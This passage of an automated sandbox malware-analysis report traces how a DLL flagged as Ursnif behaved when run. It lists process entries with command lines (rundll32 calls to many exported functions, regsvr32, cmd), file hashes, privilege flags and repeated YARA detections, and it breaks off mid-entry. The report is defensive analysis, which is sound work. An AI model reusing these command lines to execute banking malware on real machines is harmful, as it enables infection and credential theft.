                                                                                                                                                                                                                                  Commandline:loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll'
                                                                                                                                                                                                                                  Imagebase:0xf80000
                                                                                                                                                                                                                                  File size:116736 bytes
                                                                                                                                                                                                                                  MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.518028253.0000000001420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504757746.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.505290500.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.505377175.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504698368.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504300183.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504841805.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504617318.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.504419460.00000000033E8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:31
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                                                                                                                                                                                                                                  Imagebase:0x870000
                                                                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:31
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
                                                                                                                                                                                                                                  Imagebase:0x110000
                                                                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474137548.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.473987515.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.473902712.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474356584.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.523877392.00000000027C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474088169.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.528892428.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474318739.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474399932.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.474430335.0000000004CC8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:32
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322676857.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322202508.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.522287201.0000000002CF0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322499280.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.513121198.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322381939.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322406561.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322337741.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322575665.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.530985686.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322291731.0000000005168000.00000004.00000040.sdmp, Author: Joe Security
Reputation:high

General

Start time:11:11:32
Start date:10/09/2021
Path:C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:0x7ff6b63b0000
File size:823560 bytes
MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:11:11:33
Start date:10/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
Imagebase:0x930000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.294274391.0000000003610000.00000040.00000001.sdmp, Author: Joe Security
Reputation:high

General

Start time:11:11:33
Start date:10/09/2021
Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17410 /prefetch:2
Imagebase:0x12f0000
File size:822536 bytes
MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:11:11:36
Start date:10/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
Imagebase:0x930000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000007.00000002.305530234.00000000047E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:high

General

Start time:11:11:40
Start date:10/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
Imagebase:0x930000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp, Author: Joe Security

General

Start time:11:11:44
Start date:10/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
Imagebase:0x930000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000002.320841608.00000000007F0000.00000040.00000001.sdmp, Author: Joe Security

General

Start time:11:11:48
Start date:10/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
Imagebase:0x930000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000C.00000002.329480680.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security

General

Start time:11:11:49
Start date:10/09/2021
Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):true
Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82962 /prefetch:2
Imagebase:0x12f0000
File size:822536 bytes
MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:11:11:52
Start date:10/09/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage
Imagebase:0x930000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.340961934.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.346648661.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000002.433128810.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000002.438165350.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000013.00000000.342868805.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:55
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000002.347833864.0000000000920000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:59
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.366167651.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000002.459018631.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.364022083.0000000003EF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.371029885.0000000003EF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.361319898.0000000000510000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:02
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001B.00000002.372926133.00000000049A0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:08
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000002.380004706.00000000029F0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:12
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000002.389489795.00000000029F0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:15
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000002.520736013.0000000002DF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.417091528.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.530490300.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416892582.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416449935.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000002.512763307.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.417147272.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416620379.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.417041948.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416772424.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.416968580.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:19
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000002.426506350.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:20
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 820
                                                                                                                                                                                                                                  Imagebase:0x260000
                                                                                                                                                                                                                                  File size:434592 bytes
                                                                                                                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:23
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:26
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000026.00000002.477089969.0000000000610000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:27
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17428 /prefetch:2
                                                                                                                                                                                                                                  Imagebase:0x12f0000
                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:30
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak
                                                                                                                                                                                                                                  Imagebase:0x930000
                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000028.00000002.441408261.0000000002AD0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:31
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 816
                                                                                                                                                                                                                                  Imagebase:0x260000
                                                                                                                                                                                                                                  File size:434592 bytes
                                                                                                                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:12:32
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82974 /prefetch:2
                                                                                                                                                                                                                                  Imagebase:0x12f0000
                                                                                                                                                                                                                                  File size:822536 bytes
